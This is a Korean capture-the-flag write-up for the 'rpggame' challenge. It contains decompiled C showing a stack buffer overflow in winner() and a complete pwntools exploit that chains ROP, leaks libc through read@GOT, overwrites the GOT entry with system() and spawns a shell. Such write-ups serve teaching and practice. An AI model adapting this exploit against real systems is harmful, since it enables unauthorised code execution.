[Trustealth] rpggame
ipwn
2018. 4. 16. 17:51
/*
 * Decompiled entry point of the rpggame binary (Hex-Rays output, reflowed
 * for readability; tokens unchanged).
 *
 * Menu loop: reads a choice with scanf into `cho` (a file-scope variable
 * declared outside this listing) and dispatches to fight()/shop()/trainning().
 * Never returns: there is no `case 4`, so choosing "4.exit" lands in the
 * default branch and the loop simply continues.
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
    setvbuf(stdout, 0, 2, 0);   /* mode 2 is _IONBF on glibc: unbuffered stdio */
    setvbuf(stdin, 0, 2, 0);
    while ( 1 )
    {
        puts("welcome to the Coder world!\n");
        puts("1.fight");
        puts("2.shop");
        puts("3.trainning");
        puts("4.exit");
        /* Return value is not checked: on non-numeric input or EOF `cho`
         * keeps its previous value and the same branch runs again, forever. */
        __isoc99_scanf("%d", &cho);
        switch ( cho )
        {
            case 1:
                fight();
                break;
            case 2:
                shop();
                break;
            case 3:
                trainning();
                break;
            default:
                puts("defalt input!");
                break;
        }
    }
}
이 문제는 증말루다가 간단한 문제였다.
/*
 * fight(): the only path into winner().
 *
 * `power` is a file-scope counter (raised by trainning(), see below); the
 * branch into winner() is taken only once power exceeds 800.
 * Returns the puts() result on the "weak" branch, otherwise winner()'s
 * ssize_t return value narrowed to int.
 */
int fight()
{
    int result; // eax
    puts("hahaha...fight me?!?!?!??!?");
    printf("let's fight!");
    printf("you're power : %d\n", power);
    if ( power <= 800 )
        result = puts("hahahahhahahahahahaha you're very weak!");
    else
        result = winner();   /* gate: reachable only with power > 800 */
    return result;
}
fight 함수에서 winner 함수로 넘어가는 조건을 맞춰주고 ROP 해주면 된다.
/*
 * winner(): the memory-safety defect in this binary.
 *
 * `buf` is a fixed stack slot (decompiler places it at ebp-0x36), yet read()
 * is allowed up to 0x1F4 (500) bytes into it. Input longer than the slot
 * overwrites the saved frame pointer and return address: a classic stack
 * buffer overflow. Fix: give the buffer an explicit size and bound the read
 * to it (e.g. `sizeof buf - 1`); a stack canary would also detect the
 * overwrite before the function returns.
 * Returns the byte count from read() (or -1 on error).
 */
ssize_t winner()
{
    char buf; // [esp+2h] [ebp-36h]
    /* The literal is 13 bytes including its NUL; a count of 0xF (15) sends
     * two bytes past its end, a small over-read of adjacent read-only data. */
    write(1, "you're win!\n", 0xFu);
    printf("what's your name ? : ");
    return read(0, &buf, 0x1F4u);   /* unbounded relative to buf: the overflow */
}
여기서 그냥 BOF(버퍼 오버플로우)가 터진다.
/*
 * trainning(): raises the file-scope `power` by 50 per call with no upper
 * bound, which is how the `power <= 800` gate in fight() is eventually met.
 * Returns the result of the final puts().
 */
int trainning()
{
    puts("let's trainning!!");
    puts("ha,,,ha,,,");
    power += 50;   /* no cap; repeated calls grow it without limit */
    return puts("g00d,,!!!\n");
}
여기서 power 값을 증가시키고 ROP 해주면 된다.
# Exploit script from the writeup, reflowed (written for Python 2-era
# pwntools: payloads are str). Root cause it depends on: winner() reads up
# to 0x1F4 bytes into a fixed stack slot, so 58 bytes of padding reach the
# saved return address and the bytes after it are used as a ROP chain.
from pwn import *
import time  # unused

#p = remote('198.13.62.9', 5467)
p = process('./rpggame')
e = ELF('./rpggame')
rop = ROP(e)

cmd = '/bin/bash\x00'
# Distance between read and system in the target's libc. This is specific
# to one libc build, hence the two candidate values.
#offset = 0x99a10
offset = 0x9ad60

# Chain executed once winner() returns into it:
rop.read(0, e.bss(), len(cmd)+2)   # store cmd in .bss
rop.write(1, e.got['read'], 4)     # leak read@GOT (a libc address)
rop.read(0, e.got['read'], 4)      # accept 4 bytes over read@GOT
rop.read(e.bss())                  # call through read@GOT with .bss as argument

pay = 'A'*58                       # padding up to the saved return address
pay += rop.chain()

# 17 x trainning(): power = 17 * 50 = 850, clearing the `power <= 800` gate.
for i in range(17):
    p.recv()
    p.sendline('3')
p.recv()
p.sendline('1')                    # fight() -> winner()
p.recv()
p.sendline(pay)
p.sendline(cmd)

read_a = u32(p.recv(4))            # leaked read address
log.info('read : ' + str(hex(read_a)))
system = read_a - offset
log.info('system : ' + str(hex(system)))
p.sendline(p32(system))            # value written over read@GOT by the chain
p.interactive()
# Defensive takeaway: a bounded read in winner(), a stack canary, or a
# read-only GOT (full RELRO) would each break a step of this chain.
끝